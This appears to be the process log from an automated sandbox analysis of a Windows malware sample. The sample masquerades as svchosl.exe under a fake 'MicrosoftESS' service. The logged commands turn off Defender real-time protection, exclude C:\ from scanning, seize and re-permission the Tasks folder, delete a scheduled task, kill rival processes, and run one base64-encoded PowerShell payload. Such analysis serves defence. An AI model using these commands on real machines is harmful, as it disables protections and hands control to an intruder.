Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\123.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\MicrosoftSystem\run.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\MicrosoftSystem\Wmiic.exe "C:\programdata\MicrosoftSystem\wmiic.exe" install MicrosoftESS svchosl.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\MicrosoftSystem\Wmiic.exe "C:\programdata\MicrosoftSystem\wmiic" start MicrosoftESS Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 2 /NOBREAK Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net start MicrosoftESS Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Process created: C:\ProgramData\MicrosoftSystem\svchosl.exe "svchosl.exe" Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\ProgramData\MicrosoftSystem\svchosl.exe "svchosl.exe" Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Users\mig.exe "C:\users\mig.exe" Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start MicrosoftESS Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001 Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start MicrosoftESS Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIABzAHQAbwBwACAAdwBtAHMAZQByAHYAaQBjAGUACgB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAIAAvAGkAbQAgAG0AaQBnAHIAYQB0AGUALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAASQBuAHQAZQBsAEMAbwBuAGYAaQBnAFMAZQByAHYAaQBjAGUALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAATQBTAFQAYQBzAGsALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAAUwB1AHAAZQByAGYAZQB0AGMAaAAuAGUAeABlAAoAdABhAHMAawBrAGkAbABsACAALwBmACAALwBpAG0AIABXAG0AaQBpAGMALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAAVwByAGEAcAAuAGUAeABlAAoAYwBtAGQAIAAvAGMAIAB0AGEAawBlAG8AdwBuACAALwBGACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzACIACgBzAGMAaAB0AGEAcwBrAHMAIAAvAGQAZQBsAGUAdABlACAALwB0AG4AIAAiAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIgAgAC8ARgAKAGMAbQBkACAALwBjACAAdABhAGsAZQBvAHcAbgAgAC8ARgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbQBpAGcAcgBhAHQAZQAuAGUAeABlACIACgBjAG0AZAAgAC8AYwAgAGQAZQBsACAALwBGACAALwBRACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABtAGkAZwByAGEAdABlAC4AZQB4AGUAIgAKAAoA
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" stop wmservice
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im migrate.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im IntelConfigService.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im MSTask.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Superfetch.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Wmiic.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Wrap.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c takeown /F c:\windows\tasks
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn WindowsUpdate /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c takeown /F C:\ProgramData\migrate.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del /F /Q C:\ProgramData\migrate.exe
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop wmservice
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\takeown.exe takeown /F c:\windows\tasks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\takeown.exe takeown /F C:\ProgramData\migrate.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I /N "Superfetch.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\takeown.exe takeown /f c:\windows\tasks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
